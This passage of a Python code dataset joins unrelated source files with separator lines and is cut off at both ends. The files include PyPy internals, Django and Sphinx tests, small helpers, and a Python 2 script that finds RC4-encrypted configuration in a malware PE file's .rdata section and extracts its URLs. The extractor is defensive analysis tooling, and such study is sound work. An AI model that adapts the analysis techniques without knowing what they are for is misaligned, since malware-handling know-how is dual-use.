(w_parent_new is space.w_object or w_parent_init is not space.w_object): raise oefmt(space.w_TypeError, "object.__init__() takes no parameters") def descr_get___class__(space, w_obj): return space.type(w_obj) def descr_set___class__(space, w_obj, w_newcls): from pypy.objspace.std.typeobject import W_TypeObject from pypy.interpreter.module import Module # if not isinstance(w_newcls, W_TypeObject): raise oefmt(space.w_TypeError, "__class__ must be set to a class, not '%T' " "object", w_newcls) if not (w_newcls.is_heaptype() or w_newcls is space.gettypeobject(Module.typedef)): raise oefmt(space.w_TypeError, "__class__ assignment only supported for heap types " "or ModuleType subclasses") w_oldcls = space.type(w_obj) assert isinstance(w_oldcls, W_TypeObject) if (w_oldcls.get_full_instance_layout() == w_newcls.get_full_instance_layout()): w_obj.setclass(space, w_newcls) else: raise oefmt(space.w_TypeError, "__class__ assignment: '%N' object layout differs from " "'%N'", w_oldcls, w_newcls) def descr__repr__(space, w_obj): classname = space.getfulltypename(w_obj) return w_obj.getrepr(space, u'%s object' % (classname,)) def descr__str__(space, w_obj): w_type = space.type(w_obj) w_impl = w_type.lookup("__repr__") if w_impl is None: # can it really occur? raise oefmt(space.w_TypeError, "operand does not support unary str") return space.get_and_call_function(w_impl, w_obj) def _getnewargs(space, w_obj): w_descr = space.lookup(w_obj, '__getnewargs_ex__') hasargs = True if w_descr is not None: w_result = space.get_and_call_function(w_descr, w_obj) if not space.isinstance_w(w_result, space.w_tuple): raise oefmt(space.w_TypeError, "__getnewargs_ex__ should return a tuple, not '%T'", w_result) n = space.len_w(w_result) if n != 2: raise oefmt(space.w_ValueError, "__getnewargs_ex__ should return a tuple of length 2, not %d", n) w_args, w_kwargs = space.fixedview(w_result, 2) if not space.isinstance_w(w_args, space.w_tuple): raise oefmt(space.w_TypeError, "first item of the tuple returned by __getnewargs_ex__ must " "be a tuple, not '%T'", w_args) if not space.isinstance_w(w_kwargs, space.w_dict): raise oefmt(space.w_TypeError, "second item of the tuple returned by __getnewargs_ex__ must " "be a dict, not '%T'", w_kwargs) else: w_descr = space.lookup(w_obj, '__getnewargs__') if w_descr is not None: w_args = space.get_and_call_function(w_descr, w_obj) if not space.isinstance_w(w_args, space.w_tuple): raise oefmt(space.w_TypeError, "__getnewargs__ should return a tuple, not '%T'", w_args) else: hasargs = False w_args = space.newtuple([]) w_kwargs = space.w_None return hasargs, w_args, w_kwargs @unwrap_spec(proto=int) def descr__reduce__(space, w_obj, proto=0): w_proto = space.newint(proto) if proto >= 2: hasargs, w_args, w_kwargs = _getnewargs(space, w_obj) w_getstate = space.lookup(w_obj, '__get_state__') if w_getstate is None: required = (not hasargs and not space.isinstance_w(w_obj, space.w_list) and not space.isinstance_w(w_obj, space.w_dict)) w_obj_type = space.type(w_obj) if required and w_obj_type.layout.typedef.variable_sized: raise oefmt( space.w_TypeError, "cannot pickle %N objects", w_obj_type) return reduce_2(space, w_obj, w_proto, w_args, w_kwargs) return reduce_1(space, w_obj, w_proto) @unwrap_spec(proto=int) def descr__reduce_ex__(space, w_obj, proto=0): w_st_reduce = space.newtext('__reduce__') w_reduce = space.findattr(w_obj, w_st_reduce) if w_reduce is not None: # Check if __reduce__ has been overridden: # "type(obj).__reduce__ is not object.__reduce__" w_cls_reduce = space.getattr(space.type(w_obj), w_st_reduce) w_obj_reduce = space.getattr(space.w_object, w_st_reduce) override = not space.is_w(w_cls_reduce, w_obj_reduce) if override: return space.call_function(w_reduce) return descr__reduce__(space, w_obj, proto) def descr___format__(space, w_obj, w_format_spec): if space.isinstance_w(w_format_spec, space.w_unicode): w_as_str = space.call_function(space.w_unicode, w_obj) elif space.isinstance_w(w_format_spec, space.w_bytes): w_as_str = space.str(w_obj) else: raise oefmt(space.w_TypeError, "format_spec must be a string") if space.len_w(w_format_spec) > 0: raise oefmt(space.w_TypeError, "unsupported format string passed to %T.__format__", w_obj); return space.format(w_as_str, w_format_spec) def descr__eq__(space, w_self, w_other): if space.is_w(w_self, w_other): return space.w_True # Return NotImplemented instead of False, so if two objects are # compared, both get a chance at the comparison (issue #1393) return space.w_NotImplemented def descr__ne__(space, w_self, w_other): # By default, __ne__() delegates to __eq__() and inverts the result, # unless the latter returns NotImplemented. w_eq = space.lookup(w_self, '__eq__') w_res = space.get_and_call_function(w_eq, w_self, w_other) if space.is_w(w_res, space.w_NotImplemented): return w_res return space.not_(w_res) def descr_richcompare(space, w_self, w_other): return space.w_NotImplemented def descr__dir__(space, w_obj): from pypy.objspace.std.util import _objectdir return space.call_function(space.w_list, _objectdir(space, w_obj)) W_ObjectObject.typedef = TypeDef("object", _text_signature_='()', __doc__ = "The most base type", __new__ = interp2app(descr__new__), __subclasshook__ = interp2app(descr___subclasshook__, as_classmethod=True), # these are actually implemented in pypy.objspace.descroperation __getattribute__ = interp2app(Object.descr__getattribute__.im_func), __setattr__ = interp2app(Object.descr__setattr__.im_func), __delattr__ = interp2app(Object.descr__delattr__.im_func), __init__ = interp2app(descr__init__), __class__ = GetSetProperty(descr_get___class__, descr_set___class__), __repr__ = interp2app(descr__repr__), __str__ = interp2app(descr__str__), __hash__ = interp2app(default_identity_hash), __reduce__ = interp2app(descr__reduce__), __reduce_ex__ = interp2app(descr__reduce_ex__), __format__ = interp2app(descr___format__), __dir__ = interp2app(descr__dir__), __eq__ = interp2app(descr__eq__), __ne__ = interp2app(descr__ne__), __le__ = interp2app(descr_richcompare), __lt__ = interp2app(descr_richcompare), __ge__ = interp2app(descr_richcompare), __gt__ = interp2app(descr_richcompare), )
nilq/baby-python
python
import collections from sgfs import SGFS ReferenceStatus = collections.namedtuple('ReferenceStatus', ('path', 'used', 'latest', 'is_latest', 'all')) def check_paths(paths, only_published=True): sgfs = SGFS() res = [] for path in paths: publishes = sgfs.entities_from_path(path, 'PublishEvent') if only_published and not publishes: continue publish = publishes[0] if publishes else None if publish: siblings = sgfs.session.find('PublishEvent', [ ('sg_link', 'is', publish['sg_link']), ('code', 'is', publish['code']), ('sg_type', 'is', publish['sg_type']), ], ['sg_path']) siblings.sort(key=lambda x: x['sg_version']) latest = max(siblings, key=lambda pub: pub['sg_version']) else: siblings = [] latest = None res.append(ReferenceStatus( path=path, used=publish, latest=latest, is_latest=publish is latest if publish else False, all=siblings, )) return res
nilq/baby-python
python
''' Written by Jason Reaves - @sysopfb Free to use, attribute properly. ''' import sys import pefile import struct import re def decrypt(keystream, blob): for i in range(len(blob)): blob[i] ^= keystream[i%len(keystream)] def rc4_crypt(data, sbox): S = list(sbox) out = [] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) return ''.join(out) def decoder(data): conf = None #m = re.findall('''\x8a[\x82\x86]([\x00-\xff]{3}\x00)''', data) blob = None pe = pefile.PE(data=data) for section in pe.sections: if '.rdata' in section.Name: blob = section.get_data() if blob != None: temp = re.split('[\x00]{3,}', blob) temp = filter(lambda x: len(x) > 254, temp) found = None for val in temp: testdata = val[:-0x100] testkey = val[-0x100:] test = rc4_crypt(testdata, bytearray(testkey)) if 'http' in test: found = test break if found == None: possible_keys = filter(lambda x: len(x) == 256, temp) possible_data = filter(lambda x: len(x) != 256, temp) for testkey in possible_keys: for testdata in possible_data: test = rc4_crypt(testdata, bytearray(testkey)) if 'http' in test: found = test break if found != None: break if found != None: print("Found embed config!") urls = re.findall('https?:\/\/[a-zA-Z0-9\-\/\._]+', found) conf ={'urls': urls} return conf if __name__ == "__main__": data = open(sys.argv[1],'rb').read() t = decoder(data) print(t)
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- __title__ = 'baidupcsapi' __version__ = '0.2.12' __author__ = 'mozillazg,latyas' __license__ = 'MIT' from .api import PCS
nilq/baby-python
python
import inspect class SuperMixin(object): def super(cls, *args, **kwargs): frame = inspect.currentframe(1) self = frame.f_locals['self'] methodName = frame.f_code.co_name method = getattr(super(cls, self), methodName, None) if inspect.ismethod(method): return method(*args, **kwargs) super = classmethod(super)
nilq/baby-python
python
#Includes BaseClassApi class import BaseClassApi class Augmentor(BaseClassApi.Api): pass #print "This is augmentor api class: \n" def execute_augmentor_api(): BaseClassApi.Api.url_path = "api/v1/augmentors" aug_api = Augmentor() #This module gives list of organizations available. aug_api.list_operation() #This module uploads file i.e. json data and returns upload id. #BaseClassApi.Api.upload_id = aug_api.upload_file_operation(json_file_name) #This is the payload information which is required for creating organization. ## #BaseClassApi.Api.payload = {"organization": {"name": "New organization1", "url": "www.test1.com", "upload_id": "%s" %BaseClassApi.Api.upload_id }} BaseClassApi.Api.payload = {"augmentor": {"name" : "audience name" , "upload_id":"%s" %BaseClassApi.Api.upload_id}} #This module creates organization. BaseClassApi.Api.aug_id = aug_api.create_operation() #BaseClassApi.Api.general_id = "" #This is the payload information which is required for updating organization. ## BaseClassApi.Api.payload = {"organization": {"name": "Rename organization1", "url": "www.test1.com", "upload_id": "%s" %BaseClassApi.Api.upload_id }} BaseClassApi.Api.payload = {"augmentor": {"name" : "audience name" , "upload_id":"%s" %BaseClassApi.Api.upload_id}} #This module updates organization. aug_api.update_operation(BaseClassApi.Api.aug_id) #This module gives details of specific organization aug_api.show_operation(BaseClassApi.Api.aug_id) #This module deletes organization ######################## #aug_api.destroy_operation(BaseClassApi.Api.aug_id)
nilq/baby-python
python
from ..abstract import ErdReadOnlyConverter from ..primitives import * from gehomesdk.erd.values.oven import OvenConfiguration, ErdOvenConfiguration class OvenConfigurationConverter(ErdReadOnlyConverter[OvenConfiguration]): def erd_decode(self, value: str) -> OvenConfiguration: if not value: n = 0 else: n = erd_decode_int(value) config = OvenConfiguration( has_knob=bool(n & ErdOvenConfiguration.HAS_KNOB.value), has_warming_drawer=bool(n & ErdOvenConfiguration.HAS_WARMING_DRAWER.value), has_light_bar=bool(n & ErdOvenConfiguration.HAS_LIGHT_BAR.value), has_lower_oven=bool(n & ErdOvenConfiguration.HAS_LOWER_OVEN.value), has_lower_oven_kitchen_timer=bool(n & ErdOvenConfiguration.HAS_LOWER_OVEN_KITCHEN_TIMER.value), raw_value=value, ) return config
nilq/baby-python
python
from __future__ import unicode_literals import datetime from django.http import Http404 from django.utils.timezone import utc from model_mommy import mommy from kb.tests.test import ViewTestCase from kb.models import Article class TestCategoryFeed(ViewTestCase): view_name = 'kb:category_feed' view_kwargs = {'slug': 'spam'} def view(self, request): from kb.feeds import CategoryFeed return CategoryFeed()(request, slug='spam') def test_with_category_without_articles_should_fail(self): mommy.make_recipe('kb.tests.category_without_articles', slug='spam') self.assertRaises(Http404, self.get) def test_view(self): category = mommy.make_recipe('kb.tests.category_with_articles', slug='spam') mommy.make_recipe('kb.tests.published_article', created=datetime.datetime(2013, 5, 27, tzinfo=utc), created_by=mommy.make('User', username='Guido'), category=category) for article in Article.objects.all(): article.tags.add('Spam', 'Eggs') response = self.get() self.assertHttpOK(response) self.assertContains(response, '<title>Category With Articles Title</title>') self.assertContains(response, '<description>Category With Articles Description</description>') self.assertContains(response, '<title>Published Article Title</title>') self.assertContains(response, '<description>&lt;p&gt;Published Article Content&lt;/p&gt;</description>') self.assertContains(response, '<pubDate>Mon, 27 May 2013 00:00:00 +0000</pubDate>') self.assertContains(response, '<category>Spam</category>') self.assertContains(response, '<category>Eggs</category>') self.assertContains(response, '>Guido</dc:creator>') self.assertNotContains(response, '<title>Draft Article Title</title>') self.assertNotContains(response, '<title>Draft Article Content</title>')
nilq/baby-python
python
""" test_ext_autodoc_configs ~~~~~~~~~~~~~~~~~~~~~~~~ Test the autodoc extension. This tests mainly for config variables :copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS. :license: BSD, see LICENSE for details. """ import platform import sys import pytest from sphinx.testing import restructuredtext from .test_ext_autodoc import do_autodoc IS_PYPY = platform.python_implementation() == 'PyPy' @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_class(app): app.config.autoclass_content = 'class' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' A class having __init__, no __new__', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' A class having both __init__ and __new__', '', '', '.. py:class:: G()', ' :module: target.autoclass_content', '', ' A class inherits __init__ without docstring.', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' A class inherits __new__ without docstring.', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_init(app): app.config.autoclass_content = 'init' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' __new__ docstring', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: G()', ' :module: target.autoclass_content', '', ' __init__ docstring', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' __new__ docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_both(app): app.config.autoclass_content = 'both' options = {"members": None} actual = do_autodoc(app, 'module', 'target.autoclass_content', options) assert list(actual) == [ '', '.. py:module:: target.autoclass_content', '', '', '.. py:class:: A()', ' :module: target.autoclass_content', '', ' A class having no __init__, no __new__', '', '', '.. py:class:: B()', ' :module: target.autoclass_content', '', ' A class having __init__(no docstring), no __new__', '', '', '.. py:class:: C()', ' :module: target.autoclass_content', '', ' A class having __init__, no __new__', '', ' __init__ docstring', '', '', '.. py:class:: D()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__(no docstring)', '', '', '.. py:class:: E()', ' :module: target.autoclass_content', '', ' A class having no __init__, __new__', '', ' __new__ docstring', '', '', '.. py:class:: F()', ' :module: target.autoclass_content', '', ' A class having both __init__ and __new__', '', ' __init__ docstring', '', '', '.. py:class:: G()', ' :module: target.autoclass_content', '', ' A class inherits __init__ without docstring.', '', ' __init__ docstring', '', '', '.. py:class:: H()', ' :module: target.autoclass_content', '', ' A class inherits __new__ without docstring.', '', ' __new__ docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_inherit_docstrings(app): assert app.config.autodoc_inherit_docstrings is True # default actual = do_autodoc(app, 'method', 'target.inheritance.Derived.inheritedmeth') assert list(actual) == [ '', '.. py:method:: Derived.inheritedmeth()', ' :module: target.inheritance', '', ' Inherited function.', '', ] # disable autodoc_inherit_docstrings app.config.autodoc_inherit_docstrings = False actual = do_autodoc(app, 'method', 'target.inheritance.Derived.inheritedmeth') assert list(actual) == [ '', '.. py:method:: Derived.inheritedmeth()', ' :module: target.inheritance', '' ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_docstring_signature(app): options = {"members": None} actual = do_autodoc(app, 'class', 'target.DocstringSig', options) assert list(actual) == [ '', '.. py:class:: DocstringSig()', ' :module: target', '', '', ' .. py:method:: DocstringSig.meth(FOO, BAR=1) -> BAZ', ' :module: target', '', ' First line of docstring', '', ' rest of docstring', '', '', ' .. py:method:: DocstringSig.meth2()', ' :module: target', '', ' First line, no signature', ' Second line followed by indentation::', '', ' indented line', '', '', ' .. py:property:: DocstringSig.prop1', ' :module: target', '', ' First line of docstring', '', '', ' .. py:property:: DocstringSig.prop2', ' :module: target', '', ' First line of docstring', ' Second line of docstring', '', ] # disable autodoc_docstring_signature app.config.autodoc_docstring_signature = False actual = do_autodoc(app, 'class', 'target.DocstringSig', options) assert list(actual) == [ '', '.. py:class:: DocstringSig()', ' :module: target', '', '', ' .. py:method:: DocstringSig.meth()', ' :module: target', '', ' meth(FOO, BAR=1) -> BAZ', ' First line of docstring', '', ' rest of docstring', '', '', '', ' .. py:method:: DocstringSig.meth2()', ' :module: target', '', ' First line, no signature', ' Second line followed by indentation::', '', ' indented line', '', '', ' .. py:property:: DocstringSig.prop1', ' :module: target', '', ' DocstringSig.prop1(self)', ' First line of docstring', '', '', ' .. py:property:: DocstringSig.prop2', ' :module: target', '', ' First line of docstring', ' Second line of docstring', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_class(app): app.config.autoclass_content = 'class' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: C(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: D()', ' :module: target.docstring_signature', '', '', '.. py:class:: E()', ' :module: target.docstring_signature', '', '', '.. py:class:: F()', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_init(app): app.config.autoclass_content = 'init' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: C(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: D(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: E(foo: int, bar: int, baz: int) -> None', ' E(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', '', '.. py:class:: F(foo: int, bar: int, baz: int) -> None', ' F(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autoclass_content_and_docstring_signature_both(app): app.config.autoclass_content = 'both' options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.docstring_signature', options) assert list(actual) == [ '', '.. py:module:: target.docstring_signature', '', '', '.. py:class:: A(foo, bar)', ' :module: target.docstring_signature', '', '', '.. py:class:: B(foo, bar)', ' :module: target.docstring_signature', '', ' B(foo, bar, baz)', '', '', '.. py:class:: C(foo, bar)', ' :module: target.docstring_signature', '', ' C(foo, bar, baz)', '', '', '.. py:class:: D(foo, bar, baz)', ' :module: target.docstring_signature', '', '', '.. py:class:: E(foo: int, bar: int, baz: int) -> None', ' E(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', '', '.. py:class:: F(foo: int, bar: int, baz: int) -> None', ' F(foo: str, bar: str, baz: str) -> None', ' :module: target.docstring_signature', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc') @pytest.mark.usefixtures("rollback_sysmodules") def test_mocked_module_imports(app, warning): sys.modules.pop('target', None) # unload target module to clear the module cache # no autodoc_mock_imports options = {"members": 'TestAutodoc,decoratedFunction,func'} actual = do_autodoc(app, 'module', 'target.need_mocks', options) assert list(actual) == [] assert "autodoc: failed to import module 'need_mocks'" in warning.getvalue() # with autodoc_mock_imports app.config.autodoc_mock_imports = [ 'missing_module', 'missing_package1', 'missing_package2', 'missing_package3', 'sphinx.missing_module4', ] warning.truncate(0) actual = do_autodoc(app, 'module', 'target.need_mocks', options) assert list(actual) == [ '', '.. py:module:: target.need_mocks', '', '', '.. py:class:: TestAutodoc()', ' :module: target.need_mocks', '', ' TestAutodoc docstring.', '', '', ' .. py:method:: TestAutodoc.decoratedMethod()', ' :module: target.need_mocks', '', ' TestAutodoc::decoratedMethod docstring', '', '', '.. py:function:: decoratedFunction()', ' :module: target.need_mocks', '', ' decoratedFunction docstring', '', '', '.. py:function:: func(arg: missing_module.Class)', ' :module: target.need_mocks', '', ' a function takes mocked object as an argument', '', ] assert warning.getvalue() == '' @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "signature"}) def test_autodoc_typehints_signature(app): options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.typehints', options) assert list(actual) == [ '', '.. py:module:: target.typehints', '', '', '.. py:class:: Math(s: str, o: Optional[Any] = None)', ' :module: target.typehints', '', '', ' .. py:method:: Math.decr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', ' .. py:method:: Math.horse(a: str, b: int) -> None', ' :module: target.typehints', '', '', ' .. py:method:: Math.incr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', ' .. py:method:: Math.nothing() -> None', ' :module: target.typehints', '', '', '.. py:class:: NewAnnotation(i: int)', ' :module: target.typehints', '', '', '.. py:class:: NewComment(i: int)', ' :module: target.typehints', '', '', '.. py:class:: SignatureFromMetaclass(a: int)', ' :module: target.typehints', '', '', '.. py:function:: complex_func(arg1: str, arg2: List[int], arg3: Tuple[int, ' 'Union[str, Unknown]] = None, *args: str, **kwargs: str) -> None', ' :module: target.typehints', '', '', '.. py:function:: decr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', '.. py:function:: incr(a: int, b: int = 1) -> int', ' :module: target.typehints', '', '', '.. py:function:: missing_attr(c, a: str, b: Optional[str] = None) -> str', ' :module: target.typehints', '', '', '.. py:function:: tuple_args(x: Tuple[int, Union[int, str]]) -> Tuple[int, int]', ' :module: target.typehints', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "none"}) def test_autodoc_typehints_none(app): options = {"members": None, "undoc-members": None} actual = do_autodoc(app, 'module', 'target.typehints', options) assert list(actual) == [ '', '.. py:module:: target.typehints', '', '', '.. py:class:: Math(s, o=None)', ' :module: target.typehints', '', '', ' .. py:method:: Math.decr(a, b=1)', ' :module: target.typehints', '', '', ' .. py:method:: Math.horse(a, b)', ' :module: target.typehints', '', '', ' .. py:method:: Math.incr(a, b=1)', ' :module: target.typehints', '', '', ' .. py:method:: Math.nothing()', ' :module: target.typehints', '', '', '.. py:class:: NewAnnotation(i)', ' :module: target.typehints', '', '', '.. py:class:: NewComment(i)', ' :module: target.typehints', '', '', '.. py:class:: SignatureFromMetaclass(a)', ' :module: target.typehints', '', '', '.. py:function:: complex_func(arg1, arg2, arg3=None, *args, **kwargs)', ' :module: target.typehints', '', '', '.. py:function:: decr(a, b=1)', ' :module: target.typehints', '', '', '.. py:function:: incr(a, b=1)', ' :module: target.typehints', '', '', '.. py:function:: missing_attr(c, a, b=None)', ' :module: target.typehints', '', '', '.. py:function:: tuple_args(x)', ' :module: target.typehints', '', ] @pytest.mark.sphinx('html', testroot='ext-autodoc', confoverrides={'autodoc_typehints': 'none'}) def test_autodoc_typehints_none_for_overload(app): options = {"members": None} actual = do_autodoc(app, 'module', 'target.overload', options) assert list(actual) == [ '', '.. py:module:: target.overload', '', '', '.. py:class:: Bar(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Baz(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Foo(x, y)', ' :module: target.overload', '', ' docstring', '', '', '.. py:class:: Math()', ' :module: target.overload', '', ' docstring', '', '', ' .. py:method:: Math.sum(x, y=None)', ' :module: target.overload', '', ' docstring', '', '', '.. py:function:: sum(x, y=None)', ' :module: target.overload', '', ' docstring', '', ] @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description(app): app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a, b=1)\n' '\n' ' Parameters:\n' ' * **a** (*int*) --\n' '\n' ' * **b** (*int*) --\n' '\n' ' Return type:\n' ' int\n' in context) assert ('target.typehints.tuple_args(x)\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) --\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) # Overloads still get displyed in the signature assert ('target.overload.sum(x: int, y: int = 0) -> int\n' 'target.overload.sum(x: float, y: float = 0.0) -> float\n' 'target.overload.sum(x: str, y: str = None) -> str\n' '\n' ' docstring\n' in context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description", 'autodoc_typehints_description_target': 'documented'}) def test_autodoc_typehints_description_no_undoc(app): # No :type: or :rtype: will be injected for `incr`, which does not have # a description for its parameters or its return. `tuple_args` does # describe them, so :type: and :rtype: will be added. (app.srcdir / 'index.rst').write_text( '.. autofunction:: target.typehints.incr\n' '\n' '.. autofunction:: target.typehints.tuple_args\n' '\n' ' :param x: arg\n' ' :return: another tuple\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a, b=1)\n' '\n' 'target.typehints.tuple_args(x)\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) -- arg\n' '\n' ' Returns:\n' ' another tuple\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description_with_documented_init(app): (app.srcdir / 'index.rst').write_text( '.. autoclass:: target.typehints._ClassWithDocumentedInit\n' ' :special-members: __init__\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('class target.typehints._ClassWithDocumentedInit(x)\n' '\n' ' Class docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) --\n' '\n' ' Return type:\n' ' None\n' '\n' ' __init__(x)\n' '\n' ' Init docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) -- Some integer\n' '\n' ' Return type:\n' ' None\n' == context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description", 'autodoc_typehints_description_target': 'documented'}) def test_autodoc_typehints_description_with_documented_init_no_undoc(app): (app.srcdir / 'index.rst').write_text( '.. autoclass:: target.typehints._ClassWithDocumentedInit\n' ' :special-members: __init__\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('class target.typehints._ClassWithDocumentedInit(x)\n' '\n' ' Class docstring.\n' '\n' ' __init__(x)\n' '\n' ' Init docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) -- Some integer\n' == context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description_for_invalid_node(app): text = ".. py:function:: hello; world" restructuredtext.parse(app, text) # raises no error @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "both"}) def test_autodoc_typehints_both(app): (app.srcdir / 'index.rst').write_text( '.. autofunction:: target.typehints.incr\n' '\n' '.. autofunction:: target.typehints.tuple_args\n' '\n' '.. autofunction:: target.overload.sum\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a: int, b: int = 1) -> int\n' '\n' ' Parameters:\n' ' * **a** (*int*) --\n' '\n' ' * **b** (*int*) --\n' '\n' ' Return type:\n' ' int\n' in context) assert ('target.typehints.tuple_args(x: Tuple[int, Union[int, str]]) -> Tuple[int, int]\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) --\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) # Overloads still get displyed in the signature assert ('target.overload.sum(x: int, y: int = 0) -> int\n' 'target.overload.sum(x: float, y: float = 0.0) -> float\n' 'target.overload.sum(x: str, y: str = None) -> str\n' '\n' ' docstring\n' in context) @pytest.mark.skipif(sys.version_info < (3, 7), reason='python 3.7+ is required.') @pytest.mark.sphinx('text', testroot='ext-autodoc') def test_autodoc_type_aliases(app): # default options = {"members": None} actual = do_autodoc(app, 'module', 'target.autodoc_type_aliases', options) assert list(actual) == [ '', '.. py:module:: target.autodoc_type_aliases', '', '', '.. py:class:: Foo()', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr1', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr2', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', '.. py:function:: mult(x: int, y: int) -> int', ' mult(x: float, y: float) -> float', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: read(r: _io.BytesIO) -> _io.StringIO', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: sum(x: int, y: int) -> int', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:data:: variable', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', '.. py:data:: variable2', ' :module: target.autodoc_type_aliases', ' :type: int', ' :value: None', '', ' docstring', '', ] # define aliases app.config.autodoc_type_aliases = {'myint': 'myint', 'io.StringIO': 'my.module.StringIO'} actual = do_autodoc(app, 'module', 'target.autodoc_type_aliases', options) assert list(actual) == [ '', '.. py:module:: target.autodoc_type_aliases', '', '', '.. py:class:: Foo()', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr1', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr2', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', '.. py:function:: mult(x: myint, y: myint) -> myint', ' mult(x: float, y: float) -> float', ' :module: 